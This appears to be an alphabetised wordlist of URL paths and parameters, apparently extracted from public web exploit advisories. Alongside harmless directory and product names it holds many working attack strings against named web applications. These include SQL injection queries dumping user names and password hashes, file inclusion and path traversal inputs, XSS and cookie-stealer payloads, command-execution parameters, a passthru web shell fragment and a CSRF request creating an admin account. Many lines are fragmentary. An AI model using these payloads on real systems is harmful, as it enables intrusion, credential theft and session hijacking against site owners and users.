common.inc.php?allclass[0]=ZnB1dHMoZm9wZW4oJy4uL3RlbXBsYXRlcy90ZXN0LnBocCcsJ3crJyksJzw
common.inc.php?base_path=http:www.example.com
common.inc.php?$class2_all_1[0]=[base64_encode(eval php code)]
common.inc.php?$class2_all_1[0]=ZnB1dHMoZm9wZW4oJy4uL3RlbXBsYXRlcy90ZXN0LnBocCcsJ3crJyksJzw
common.inc.php?file=[Local File]
common.inc.php?LANG_CODE=..
common-menu.php?CONF[local_path]=[evil_scripts]
common.php?bit=avatars
common.php?bit=file.type%00                                         #
common.php?db_file=[Ev!lScript]
common.php?dir=Shell
common.php?env[include_prefix]=[evil_scripts]
common.php?f=0&ForumLang=..
common.php?g4_path=..
common.php?include_path=[shell]
common.php?lang_file=[ShELL]
common.php?locale=[[Sh3LL Script]]
common.php?module_root_path=[Ev!lScript]
common.php?module_root_path=YouRSheLL?
common.php?PHORUM[http_path]=[evil_scripts]
common.php?root_path=ShellCode
common.php?script_path=CmdShell
common-tpl-vars.php?admindir=[RFI]
common-tpl-vars.php?conf[lang]= [LFİ] (Windows Only)
common-tpl-vars.php?lang=[LFi]
com_moofaq
com_mosmedia
com_mospray
com_mp3_allopass
commport
com_mtree
com_multibanners
communication
communication-tools
communities-a-groupware
community
Community
community-5.2.7c
communitycms
community-events
community.php?section=News
community-polls
communitytranslate
community.zikula.org
commupdate.php (type=count&s=[file]\0)
com_nfn_addressbook
com_ongumatimesheet20
com_onlineflashquiz
com_oziogallery2
comp
compact.asp    (DB path disclosure)
compactcms
com_panoramic
company
company.htm )
companyinfo.php?id=83(SQL)
companylogo
company.php?cat_id=-2%20union%20select%201,group_concat%28Login_Name,0x3a,Password%29,3,4,5,6,7,8+from+login_table
compare_form.php?server_id=0&dn=%22%3Cscript%3Ealert(&#039;r0t&#039;)%3C
compare_product.php?id=1%20union%20select%201
com_paxgallery&task=table&gid=[$qL] 
competitions
competitions.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
complete
complete-gallery-manager
complete-gallery-manager-for-wordpress
complete-modules
compmaster
com_pollxt
component
componentjradio
components
components.moonsoft.es
com_portfolio
compose-attach.php3?BSX_LIBDIR=<br>"
compose-menu.php3?BSX_LIBDIR=<br>"
compose-new.php3?BSX_LIBDIR=<br>"
compose.php?GLOBALS[config][dir][functions]=[AvriLhea]
compose.php?mailbox=">&lt;script&gt;window.alert(document.cookie)&lt;
compose-send.php3?BSX_LIBDIR=<br>"
comps
compte.php?achat=1&valider=1&identifiant='%20OR%20''='&password='%20OR%20''='
compter.php Will be Included And Executed withe the privilege of the webserver
compteur
compt_new
compt.php?id=2147
compt.php?id=3312
compt.php?id=3521
computechnix
computer_inventory.php
computerstore
com_remository_files
com_reporter
com_rssreader
com_rssxt
com_rwcards
com_sebercart
com_securityimages
com_simpleboard
com_swmenupro
com_treeg
com_uhp
com_universal
com_videodb
comvironment
com_virtuemart
com_vtiger_workflow
com_wmtportfolio
com_xcloner-backupandrestore
com_xgallery
com_xmovie
conad
concrete5
concrete5.4.2
concrete5.4.2.1
concrete5.6.1.2
concretecms
/?co=news&id={news id}
conf
_conf
conf_global.php 
config
Config
*&config=cfg-default.php
config.dadamail.php?GLOBALS[mosConfig_absolute_path]=[evilcode]
config.data
configdata.php%00z
config_db.php
configdb.php :
config.dist.php?cmd=cat%20config.php
config_edit.php
config_global.inc.php%00
config_HTML_MENU.php?HTML_MENU_DirPath=[[Sh3LLScript]]
config.html.php?mosConfig_absolute_path= [sh3ll inj3ct0r]
&config[image_module]=blah
config.inc
config.inc.php
config.inc.php               #
config.inc.php%00
config.inc.php%00.htc
config.inc.php?a=ls -la
config.inc.php?cmd=uname -a
config.inc.php&CURRENT_PIC[filename]=
config_inc.php&do_suck=h
config.inc.php)+from+mysql.user--
config.inc.php?morx=$cmd");
config.inc.php?racine=[Bad Code]
config.inc.php?racineTBS=[PHPSHELL]
config.inc.php?shell=Evil Text\r\n";
config.inc.php&t=2233577313&ip=127.0.0.1&s=m
config.ini
config_key=0x70617373776F7264
config.loader.php?COREROOT=..
config.loader.php?COREROOT=[LFI]
config_local.php?PROJECT_ROOT=[Evil_Script]
configMain" method="post" name="main">
config" method="post">
config-operators-edit.php?operator_username=administrator
config.php
config.php 
Config.php
_config.php%00
config.php %00
config.php%00
config.php%00 \
config.php')%20FROM%20pp_config%20into%20outfile%20'[path_you_just_found]
config.php),3,4,5--
config.php&action=Delete
config.php?action=users&whattodo=savenewuser">
config.php?action=view&screen=bookmarks&module=Bookmarks&do=edititem&save=1&id=1">
config.php?_CCFG[_PKG_PATH_DBSE]=..
config.php?cmd=ls -la<
config.php?cmd=shell<
config.php&default_folder=
config.php?display=trunks&tech=%3C
config.php?env[include_prefix]=[evil_scripts]
config.php?env[inc_path]=                                           #
config.php?fpath=[script]
config.php?func=user&add=true&go=true">
config.php?id=2'[inj3ct h3re]
config.php?id= [INJECT HERE]
config.php?inc_dir=ShellURL
config.php?language=..
config_PHPLM.php?HTML_MENU_DirPath=[[Sh3LLScript]]
config.php?newlang=kacper&languages[kacper][file]=..
Config.php\n\n";
config.php?nst=id 
config.php -P1.1.1.1:80\r\n\r\n";
config.php?path_to_root=[[Sh3LLScript]]
config.php?prefix=[LFI]
config.php\r\n";
config.php?settings[SET_LANGUAGE]=[EV!L]
config.php?shell=Evil Text\r\n";
config.php' & trigger
config.php?vid=1&pid=11&pid=-1+union+select+1,2,3,4,group_concat(user_login,0x3a,user_pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+from+wp_users--
config.php?vid=[SQL]
config.php?wpabspath=RFI
configscreen.inc.php
config_settings.tpl.php?include_path=
&config[show_album_desc_prev]=yes
&config[show_comments]=1&config_album[show_comments]=1
configsite.inc.php
configsql.inc.php
configtache.inc.php
configuration
configuration.html#suhosin.executor.func.blacklist ?)
configuration.php
Configuration.php
configuration.php%00
configuration.php?action=saveconfig&zapis=ok'><tr>
configuration.php&download=1
configuration.php?gID=1&action=save" method="post" name="main">
configuration.xml
configure.asp
ConfigureEditUserPage.class.php?base_path=[evil_scripts]
configure', false);
ConfigureNewUserPage.class.php?base_path=[evil_scripts]
ConfigureNewUserReceiptPage.class.php?base_path=[evil_scripts]
configure.php
configure.php 
configure.php?phpbb_root_path=Evil?           |
ConfigureUsersPage.class.php?base_path=[evil_scripts]
config.xml
conf.inc
confirm.php?e[]&list= { file + nullbyte }
confirm.php?folder=a&id=[SQL]
confirm.php?id=[sqli]
confirm.php?language=..
confirmUnsubscription.php?output=[SHELL]    
confixx
[confixx]
confMgr.php"
confMgr.php?m=al_adminListener%3Cscript%3Ealert(document.cookie)%3C
conf.php
conf.php?en=[Ev!l]
conf.php?en=uname -a
conf.php&photo_type=ttxt
conf.pollxt.php?mosConfig_absol
conf_users_edit.php?action=N">
connect
connect.inc
connection.php
connectix
connector.aspx
connector.php
connector.php?Command=FileUpload&Type=File&CurrentFol
connector.php?Command=GetFoldersAndFiles&Type=..
connector.php&Type=File
connector.php&Type=Image
connectors
connect.php?language_path=[Shell]
_connect.php?root=[[Sh3LL Script]]
conpresso
console.php" method="post">
constants.php
constants.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
constructr
constructr-cms.org
constructrXmlOutput.content.xml.php?page_id='[INJECT POINT];--";--
consulting
contact
contact"
contact.aspx (sell script )
contact_author.php?userid=1+and+1=0   false
contact_author.php?userid=1+and+1=1+and+substring(@@version,1,1)=4  true
contact_author.php?userid=1+and+1=1+and+substring(@@version,1,1)=4   true
contact_author.php?userid=1+and+1=1+and+substring(@@version,1,1)=5  false
contact_author.php?userid=1+and+1=1+and+substring(@@version,1,1)=5   false
contact_author.php?userid=1+and+1=1   true
contact_author.php?userid=1 user()
contact-config.php
contact_content.php?root_path=[evil script]
contactform.php
contactform.php?filled=11aefd"><script>alert(1)<
contact-form-wordpress
contact.htm?user=admin%22%3E%3Cscript%3Ealert(document.cookie)%3C
contact.inc.php?template_path=[LFI]
contactmanager.htm
contactmanager.htm	  
contact-me
contacto
contact.php
contact.php?action=submit&Name=1&EmailAddress=1&AccountUsername=1&Message=&lt;
contact.php?cid=-1+UNION+SELECT+1,2,concat_ws(char(58),id,user_nick,user_pass,concat(user_prename,char(0x20),user_name))+from+t_user--
contact.php?cid=-1+UNION+SELECT+concat_ws(char(58),id,user_nick,user_pass,concat(user_prename,char(0x20),user_name))+from+t_user--
contact.php HTTP
contact.php?id=
contact.php?id=1
contact.php?id=-11111111'+union+select+1,2
contact.php?idfestival=7 (SQL)
contact.php?op=sendmail&text=this is spam&from=none&name=Admin&email_to=example@example.com&sitename=www.example.com 
contact.php\r\n";
contact.php?u=..
Contact_Plus
Contacts
contacts-and-feedback
contacts.php?idc=-1)%20UNION%20SELECT%20@@version%23
contacts.php?idc=-1) UNION SELECT @@version%23
contacts.php?op=edit&id=3&form_id=2'
contacts.php?theme=..
contacts.php?var1=[SQLi]
contactstaff.php?returnto="><script>alert(123);<
contact_support.php?mode=1%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C
contact-us
contact_us.php
contact_us.php" enctype="application
contact_us.php?&name=1&email=1&enquiry=%3C
contact_view.php?id_contact=[sql]
Container.php?includeFile=[EV!L]
container.php?theme_directory=[Shell]%00
contak
contao
<contao_ip>:80
contenator.ansatheus.de
contenido
Contenido_4.8.4
content
/?content=<
content_add.php" method="post" name="main">
content_class.php?GLOBALS[where_framework]=[cmd_url]
content-component
content_css.php?templateid=-1
_content_data
Content-Download
contentFiles
content-flow3d
contentFolder.php?parentId=
contentFolder.php?parentId=1+and+1=1 [and+1=2]
content_id
contentid,1067
content_image.class.php?GLOBALS[application][app_root]=[SHELL]
content-management
Content-Management
) content management system is prone to 
content-management-system.php
contentnow
contentNow
contentnow_130
[contentNow_path]
contentone
contentPage.php?id=
contentPage.php?id=<marquee><font color=Blue size=15>XroGuE<
content_pages_edit.php") via http POST method.
content.php?ax=file_upload
content.php?cat=[SQL]
content.php?cid=[SQL] 
content.php?db_driver=..
content.php?_ID=..
content.php?id=1
content.php?id=1+union+select+1,2,3,4,[sqli],6,7,8,9,10,11,12,13
content.php?id=-1+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13
content.php?id=-5+UNION+SELECT+ALL+1,2,3,4,group_concat(Username,0x3a,Password)+from+Users--
content.php?id=[sqli]
content.php?kat='+union+select+1
content.php?p=[file]
content.php?screen=resellers
content.php?s=owned&p=owned&curcount=[PHP_SCRIPT]
content.php?theme_dir=..
content.php?topic=database()
content.php?topic=id
content.php?topic=[sqli]
content.php?topic=user()
content.php?topic=version()
Contents,Download,View,8.phtml";
contentserv
contents.php
context_menu.inc.php?install_root=[Shell]
cont_form.php?cf_id=1&fid=0,333 (sell script )
cont_form.php?cf_id=-1+union+select+1,2,3,4,5,6,7,8,Group_concat(uname,0x3a,pword),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+tblstr--
cont_form.php?cf_id=[N.A.S.T ]
cont_form.php?cf_id=[N.A.S.T ] 
contract_add_service.php?contractid=1%20union%20%28select%20min%28@a:=1%29from%20%28se lect%201%20union%20select%202%29k%20group%20by%20%28select%20concat%28@@version,0x0,@a:=%28@a%2B1%29 %2%29%29%29%20+--+
contract_add_service.php?contractid=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C
 || !$Contrex){usage()}
contrib
contribtracker
contribtracker-init.php?gfplugins=[Shell]
control
CONTROL
Controladores
control.block.php?lang=[SHeLL]
/?controller=category&path=1&page='
controller.class.php?actionPath=[file]
/?controller=main&function=index&pageIndex[$test]=1&paginationKey=comments
controller.php?document&upload&patient_id=2&parent_id=%22%3E%3Cscript%3Ealert%2810%29%3C
controller.php?load=&lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00.jpg
controller.php?zf_path=[Shell]
controllers
/?controller=user&user_id=1&action=update;action=update" method="post" enctype="multipart
controlpanel
controlpanel.php
control_panel_sample.php
control.php"
controls
contropotere.altervista.org
contropotere.altervista.org || <
"> Contro Potere Hacking Crew <
contropotere.netsons.org
contropotere.netsons.org	    #
contus-hd-flv-player
convert
convert.base64-encode
CONVERT(CONCAT(name,0x3a,password,0x3C62723E)
converter.inc.php?include_path=[darkcode]			[»]
cook
cookie
cookie_auth.php?action=cookie_login
cookie.cgi&#039;%2Bdocument.cookie<
cookie=\"+document.cookie+\"=\"<
cookie.html
cookielogger.php?cookie=' + document.cookie;
cookiemonster.php?cookie='+document.cookie;<
cookie.php?cookie=" +
cookie.php?cookie=\'
cookie.php?cookie='+document.cooke><
cookie.php?cookie=" + document.cookie;<
cookies.php?
cookies.php?c='+document.cookie);<
cookies.php?c='+document.cookie);"
cookie-stealer
cookiestealer.php?c='+document.cookie)]
cookie_stealer.php?c="+document.cookie' b='<pre' >
cookiestealer.php?cookie=%22 %2B document.cookie;<
coolphp
cooltey.myweb.hinet.net
coppermine
coppermine-gallery.net
coppermine-gallery.net                                            |
Copperminer.jpg.php?[command]
co-profile.php?emp_id=1+AND%20SUBSTRING(@@version,1,1)=5
co-profile.php?emp_id=[BLIND]
co-profile.php?emp_id=null+union+select+version(),2,3,4,5,6,7,8--
co-profile.php?emp_id=[SQL]
copy_form.php?server_id=0&dn=%22%3Cscript%3Ealert(&#039;r0t&#039;)%3C
copy [items%5B0%5D parameter]
copyleft
Copy_of_calendar_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL
copyright-licensing-tools
core
core12
Core%206
Core%20Product
coreadmin.php" method="post" name="registrationform">
core-design-scriptegrator-plugin.html
core-enhancements
core_files
core.html#limitrequestfieldsize
core.incl.php?Setting[OPT_includepath]=[-Sh3ll-]
Core.php?BEAUT_PATH=*evilsite*
core.php?CMS_ROOT=[Evil> Script]
core.php?root=[Evil Script]
core.process_compiled_include.php?smarty=[EV!L]
core_profile.header.php?language_path_core=[SHELL]
core_security_advisories.asc.
core.write_compiled_include.php?smarty=[EV!L]
corporate
corrado-liotta
CorradoLiotta
CorryL
corryl.altervista.org
corryl.altervista.org";ini_set("max_execution_time",0);passthru($_GET["cmd"]);die;?>
Corvette&image=[EVIL_SCRIPT]
 - CosCMS is a simple framework for building web application. It is intended for users, who wants some common modules, and a platform with a small code base which is easy to extend.
cosmetics_zone
cosmetics-zone-a-shopping-cart-for-your-cosmetics-shop-online.html
cotisation.class.php?path_om=[Shell]
cotonti
Cotonti
cotonti-0.9.4
 - Cotonti is a powerful open-source web development framework and content manager with a focus on security, speed and flexibility.
count
count.asp?u_link=dload.asp
counter
Counter_forensics
counter.php
counter.php?inc=whtever&DefineRootToTool=[shell] <-- RFI
counter.php?theCount=%3Cscript%3Ealert(document.cookie)%3C
countlines.php
count-per-day
count-per-day 
count.php?refkey=..
country
countrydetails.php?es_id=-1+UNION+ALL+select+1,Group_concat(CONVERT(es_id USING utf8),0x3a,CONVERT(es_admin_name USING utf8),0x3a,CONVERT(es_pwd USING utf8)),3,4+from+esb2b_admin--
countrydetails.php?es_id=sql[N.A.S.T ]
country_escorts.php?country_id=(SQL)
couponer
Coupons.csv
couponsite
coupons.php?action=<script>alert(0)<
cource.php?action=pregled&cont_id=21&courc_id=-2+union+select+version%28%29--
courrierautorisation.class.php?path_om=[Shell]
courrier.class.php?path_om=[Shell]
courrier.recherche.tab.class.php?path_om=[Shell]
course_category
coursedetail_eng.php?idcourse=[SQL Injection]
coursems
coursems2_2
coursepage.php?id="
coursepage.php?id="<marquee><font color=Blue size=15>XroGuE<
courses
cover_original_8.php?cmd=cat%20
cover_original_8.php?cmd=cat%20..
Cover The Link By Any Thing Use Your Brain
cowadmin
cp
CP
cp -- and put there information
cpanel_1_log.htm   |
cpanel_1_log.htm      |
cpanel_1_log.htm       |
cpanel_1_log.htm                |
cpanel_1_log.htm #
cpanel.net
cpassman
cPath
cpcommerce
cpcommerce.cpradio.org
cpcommerce.org
cp_dpage.php?aiocp_dp=aiocp
cpdynalinks
cp_edit_user.php?uemode=&user_agreed=I+AGREE&user_id=2&user_name=new_admin&user_email=x%40x.com&x_user_email=%5E%28%5Ba-zA-Z0-9_%5C.%5C-%5D%2B%29%40%28%28%5C%5B%5B0-9%5D%7B1%2C3%7D%5C.%5B0-9%5D%7B1%2C3%7D%5C.%5B0-9%5D%7B1%2C3%7D%5C.%29%7C%28%28%5Ba-zA-Z0-9%5C-%5D%2B%5C.%29%2B%29%29%28%5Ba-zA-Z%5D%7B2%2C4%7D%7C%5B0-9%5D%7B1%2C3%7D%29%28%5C%5D%3F%29%24&xl_user_email=email&newpassword=Password1&user_password=81dc9bdb52d04dc20036dbd8313ed055&newpassword_repeat=Password1&user_regdate=2002-10-13+08%3A38%3A31&user_ip=127.0.0.1&user_level=10&user_language=eng&user_firstname=&user_lastname=&user_birthdate=0000-00-00&x_user_birthdate=%28%5B0-9%5D%7B4%7D%29-%28%5B0-9%5D%7B1%2C2%7D%29-%28%5B0-9%5D%7B1%2C2%7D%29&xl_user_birthdate=birth+date&user_birthplace=&user_piva=&user_fc=&MAX_FILE_SIZE=500000&user_photo=_blank.png&user_signature=&user_notes=&menu_mode=add&ff_required=user_name&ff_required_labels=name&adm=1" 
cpg
cpg1410
cpg1414
cpg1419
cpg1518
cpg_error.log%00
c.php
c.php')
c.php?c='+document.cookie+'&l='+window.location">Hello
c.php?c='+document.cookie;this.sss=null`style='font-size:0; X="<B ">'<
c.php?c='+(eval(('D'+'o'+'C'+'u'+'M'+'e'+'N'+'t'+'.'+'C'+'o'+'O'+'k'+'I'+'e').toLowerCase()))) width=0 height=0>
c.php?cookie="+document.cookie +"'
c.php => Find It
cp_html2xhtmlbasic.php?page=[SHELL]
cpindex.html
cpl
cplphoto.php?postid=11+and+1=1+union+all+select+1,2,concat(user_login,0x3a,user_pass),4,5,6,7,8,9,10,11,12+from+wp_users--&id=11
cplphoto.php?postid=416+and+1=1+union+all+select+1,2,concat(user_login,0x3a,user_pass),4,5,6,7,8,9,10,11,12+from+wp_users--&id=2097
cplphoto.php?postid=[INDONESIANCODER]&id=[VALID ID]
cp_main.asp?mode=EditIt&cmd=9" method="post">
cp.php
cp.php?action=members" method="post">
cp.php?do="><script>alert(1)<
cp.php" method="POST">
cp_polls_results.php?poll_language=eng&poll_id=-0+union+select+0,1,2,version(),4,5,6--
cp_upload_image.php
cr
cracker
crackfor.me
crackfor.me - online md5 crack service
Craiglist-Gold-4444.html
craigslist-clone-script
crawlrate-tracker
Crazy_Goomba_1.2.1_path
crea.php?plancia=[spread?]
creasito
create
create)
create) 
create_account.ei
createaccount.php
create_account.php" method="post" name="main" >
create_account_process.php";
createadmin.php?PHPSESSID='.session_id().'">
CreateAdminUser.php">
create_ajax HTTP
create_album.php
createallimagecache.php?PATH_TO_CODE=[SHELL]
create_course.php?show_courses=[code]
create_course.php?show_courses=[code]&current_cat=[code]
createemails.php?ROOTDIR=[evilc0de]
create_engine.php\r\n";
create_image_gallery.php
create" method="post">
createnewadmin.php" onsubmit="javascript: return checkifvalid();">
create.php
create.php?card_color='><script>alert(document.cookie)<
create.php?card_fontsize='><script>alert(document.cookie)<
create.php?card_id=1>"><ScRiPt%20%0d%0a>alert(+213771818860)%3B<
create.php?card_id='><script>alert(document.cookie)<
create.php?card_id=[SQL]
create.php" method="post">
create.php?uploaded='><script>alert(document.cookie)<
create?render=overlay&render=overlay">
create_sub.html" method="post" name="main">
create_ticket.php
create_topic.php
createusernamen
create_voting_poll.html
creativecommons.org
CreativeFiles
creatures.site88.net
credit_card_info.php
credits.html.php?mosConfig_absolute_path=[shell] "
credits.php
CREDITS.php%00
critical-security-vulnerability-76537
$crlf".
crm
crmsfa
cron
cronjobs
cron.log
crono.php?pid=-1+UNION+SELECT+1,2,3,4,VERSION(),6,7
crono.php?prid=-1+UNION+SELECT+1,2,3,4,VERSION(),6,7
cronos
cron.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
crons.php?plan_id=35&domain=[SQL]
crons.php?plan_id=[SQL]
crontab
crossdomain.xml
crosspromoteitems.php?item_id=2876+and+1=0--
crosspromoteitems.php?item_id=2876+and+1=1--
cross-site-file-upload-attacks
cross_site_fix.patch
Cross-site_request_forgery
Cross-Site_Request_Forgery_%28CSRF%29_Prevention_Cheat_Sheet
Cross-Site_Request_Forgery_%28CSRF%29_Prevention_Cheat_Sheet#General_Recommendation:_Synchronizer_Token_Pattern 
Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet
Cross_site_scripting
cross-site-scripting-payloads
crsde.jpg
Crux
crypta
cs
cs1120
CS-4179
cs-cart cms
[CS-Cart_path]
cs-cms
/?c='><script>alert(window.document.url)<
cse?cx=013269018370076798483%3Awdba3dlnxqm&q=$dork&num=100&hl=en&as_qdr=all&start=$i&sa=N");
csg4vt".
c-sky
csn_util.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
cs.php?ck='
csrf_cross_site_request_forgery_in_dalbum.html
csrf_cross_site_request_forgery_in_phpgraphy.html
csrf_cross_site_request_forgery_in_vcalendar.html
csrf-file-upload-poc.html
csrf.php?cmd=[command]
csrf.php" style="display:none" 
csrf.php" URI.
css
css"?>
cssedit
cssloader.php?file=..
cssloader.php?files[]=..
css.php?ewiki_id=..
css.php?ewiki_id=1&ewiki_action=..
css.php?theme=..
css" rel="stylesheet" media="all" href="themes
c_status.php
csv.php
 -c 'system(\"uname -a;id\");'\n\n");
ctacok.ru
ctl
cubecart
cubecart_3011_sql.html
cubedir
cultbooking.php" enctype="application
cultbooking.php HTTP
cultbooking.php?lang=..
cultbooking.php?lang=%22%3E%3Cscript%3Ealert%281%29%3C
cultbooking.php?lang=c%3A%5C%5Cboot.ini%00
cultbooking.php?lang="><script>document.location.href=String.fromCharCode(104, 116, 116, 112, 58, 47, 47, 122, 101, 114, 111, 115, 99, 105, 101, 110, 99, 101, 46, 109, 107);<
cup
cuppa
cuppacms
curl.haxx.se
currencies.php", "c=".base64_encode($cmd)), $m) ? print $m[1] : die("\n[-] Exploit failed\n");
currency-converter).
current
Current%20Release
&CurrentFolder= 
currentFolderPath" value="([^"]*)"
custchoice.php?lang=English&userid=<name>&action=To see your connections logs
custchoice.php?lang=English&userid=<name>&action=To update your password
custdemos
custom
CustomApps
custombuss_cardscript.html
custom_category.php
customcms.net
custom-content-type-manager
customer
customer_credit_invoice.php
customer.forumtopic.php?forum_topic_id=-1 union select concat(username,0x3a,password),2,3,4,5,6 from psf_config_tb
customer_ftp.php
customer_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL
customers
Customers
customers.php?page=1&cID=USERID&action=statusconfirm" method="post" name="main">
customers.php?search=1"><script>alert(document.cookie)<
customer_statistics_list.php?a=search&value=1&SearchFor=muuratsalo&SearchOption=Contains&SearchField=[SQL
customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers
customer.tickets.view.php?so=ASC&sb=[SQL]
customer.tickets.view.php?so=ASC&sb=Status&nr=[SQL]
customer.tickets.view.php?so=[SQL]
CustomFields.asp?Group_ID=1%20union%20select%20PASSWORD,1,1,1,1,1%20from%20users%20where%20USERID=%20'admin'--
CustomFields.asp?Group_ID=1union%20select%20@@version,1,1,1,1,1--
CustomizeFields.php?GLOBALS[sugarEntry]=1&theme=..
customize.php?l=..
customize.php?tid=1314+and+1=0--
customize.php?tid=1314+and+1=1--
customize.php?tid=[id]+[SQL]
custom.php");
custom.php?pagename=[Local File Inclusion];
custom.php?pagename=teeeeeeeeeeee
custom-post-type.php
customprofile.php?id=62(SQL)
customprofile.php?id=[id number][SQL]
customt-shirt_designscript.html
customView.htm
cute141
cuteflow
cuteflow-bin-v150
cuteflow\.org" target\=\"\_blank\"\>
cutenews
cutenews.1.4.5
cutenews-utf8
cut.php                                                  #
cut.php?id=-1 union select 1,@@version,3,4,5,6,7,8,9,10,11         #  
cve-2011-1546
cve-2011-4107-poc-phpmyadmin-local-file-inclusion-via-xxe-injection
cve-2012-1503-movable-type-pro-513en.html
cvekey.cgi?keyword=wordpress
cve.mitre.org
cve.mitre.org), which standardizes names for
cvename.cgi?name=CVE-2007-1899
cvename.cgi?name=CVE-2008-0196
cvename.cgi?name=CVE-2008-0300
cvename.cgi?name=CVE-2008-0301
cvename.cgi?name=CVE-2008-4454			#
cvename.cgi?name=CVE-2008-5619
cvename.cgi?name=CVE-2010-4006
cvename.cgi?name=CVE-2010-4298
cvename.cgi?name=CVE-2010-4313
cvename.cgi?name=CVE-2010-4330
cvename.cgi?name=CVE-2010-4331
cvename.cgi?name=CVE-2010-4332
cvename.cgi?name=CVE-2010-4333
cvename.cgi?name=CVE-2011-1099
cvename.cgi?name=CVE-2011-1546
cvename.cgi?name=CVE-2012-1669
cvename.cgi?name=CVE-2012-1670
cvename.cgi?name=CVE-2012-1671
cvename.cgi?name=CVE-2012-1672
cvename.cgi?name=CVE-2012-1673
cvename.cgi?name=CVE-2012-2226
cvename.cgi?name=CVE-2012-5469
cvename.cgi?name=GENERIC-MAP-NOMATCH
cvsout)
cvs.php?log=
cvss.cfm?calculator&adv&version=2
cvssyncmail-init.php?gfplugins=[Shell]
cvstracker
cvstracker-init.php?gfplugins=[Shell]
cvsweb.php
cw
cw3
cwe.mitre.org
cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. 
Cwfm-0.9.1_(Language)_Remote_File_Inclusion.htm
cwfm.sourceforge.net
 cwhuser cwhpass\n";
cwmVote.rar  #
cXIb8O3.php'
cXIb8O3.php?cx=cat 
cyberbrau-0.9.4a.tgz
cyberbrau.sourceforge.net
cybercheffe
cyber-cms
cyberfolio_7_12.2
cyberfolio.org
cyberfusion.ramx.org
cyber-security.org
cybershadecms
cyberspy.asp           #
cybsec_advisory_2010_0601_Phreebooks_v2_0_Directory_Traversal.pdf
cybsec_advisory_2010_0602_Phreebooks_v2_0_Local_File_Inclusion.pdf
cybsec_advisory_2010_0603_Phreebooks_v2_0_Multiple_Permanent_Cross_site_Scripting.pdf
CydiaRepoManager1.png
CydiaRepoManager2.png
CydiaRepoManager3.png
[CydiaRepoManager_path]
cyphor
/?d=2R592KO0
d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=[INDONESIANCODER-Ev1L]
d4wood.by.ru
D8
dadamailmanager
dafunspirit
dagger
dagger_r23jan2007.
Daily_inspirational_quotes_web_site_script_and_database.html
daily-snapshots
dalogin
dalogin.sourceforge.net
daloradius
damac.us
danieljamesscott.org
darius.php+$[NEW PATH]%00
dark
darkcode.ath.cx
DarkCode.me
darkportal
dasforum
dashboard
Dashboard
Dasher.php
data
DATA
database
database	 *
database_api.php?g_db_type=informix:
database_api.php?g_db_type=mysql:
database-backup.php" method="post" name="adminForm">
database.inc.php
database_interface.lib.php?cfg[Server][extension]=cXIb8O3 
DatabaseManager.php?path=<File Inclusion>%00
database.php
database.php?action=write&userID=1
database.php?sys_dbtype=[Evil_Script]
databases.php?plan_id=35&domain=[SQL]
databases.php?plan_id=[SQL]
database.sql
database(),user(),version(),user(),database(),6,7,user(),9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24
DataDetayAll.asp?Data_id=586
DataDetayAll.asp?Data_id=587
DataDetayAll.asp?Data_id=594
DataDetayAll.Asp?Data_id=596
datadump.sql
datagrid
datagrids.clubsareus.org
data_navigator
data.php
data.php?jiko=[shell]
data.php?jiko=[shell]<
data-reports
data. These
dataupload
date-auktion-v2
date-converter
date_format.php?baseDir=[REMOTE INCLUDE]
datesel.php?form=editentryform&fday=rpt_day"%20onclick=javascript:alert(document.cookie)>&fmonth=rpt_month&fyear=rpt_year&date=20041001
datesel.php?gfplugins=[Shell]
dati
dating
dating3
dating3.php
dating_demo
datingpro.127.0.0.1:5723
Dating_Scripts
datingzone_path
datumscalc.php?kal_class_path=[INDONESIANCODER]
day.php?font="><script>alert('LOL')<
day.php?gfplugins=[Shell]
day.php?LocationID="><script>alert('LOL')<
day.php?query=CalendarDetailsID=-1) UNION SELECT Password,0 FROM phpcalendar_adminusers WHERE AdminUserID = 1
db
_db
Db
DB
db_adodb.php?baseDir=[attacker] 
dbase.php?env[include_prefix]=[evil_scripts]
db_backup
db_backup.php
dbbackup.php
db_backups
dbbatch.php?lng=..
DbbS
dbcommon
db_config.inc.php?base_dir=[evilcode]	 |
dbconfig.php
db_config.php%00
db_connect_log.inc.php
dbconnect.php
db_connect.php?baseDir=[REMOTE INCLUDE]
db_connect_universal.inc.php
 db_conn.php?root=[SHELL_URL]?
db_create.php
db_details_importdocsql.php?submit_show=true&do=import&docpath=[..
dbfiles.php?path_faqe=[INDONESIANCODER]
DBHcms
dblib.php
dbman_filter.inc.php?lib_path=[evil_scripts]
db.mdb
DB.MDB
dbmodules
" . "db_mysql.inc");
dbo
db.php
db.php">
db.php%00
db.php4
db.php?commonpath=sh3lz?
db.php?rootdp=
DBQ
db_restore.php?dates%5B%5D={1}_kimai_var%20UNION'
db_restore.php'%options.ip).read()
db_restore.php?submit=create+backup'%options.ip)
dbtools.php?query=[SQL_QERY_HERE]&submit=Go&do=run_query
dbutil.bck.php?confdir=[Evil_Code]
dbutil.php?confdir=[Evil_Code]
db_utils.php?donsimg_base_path=[SHELL]
DC
dcfmblog
dcfm-blog
dcm.php?module=mandat0ry for your shell!
dcm.php" size="50" 
dcp
[dc_path]
[dc_path]admin
dc.php?dcid=80477172'
dcp-portal611
dcreature
dcsflashgames.html
ddcms
ddl-speed.org
de
deal-13.html
dealer
deanload
death.html><
deb.php
debs
debug
debugger
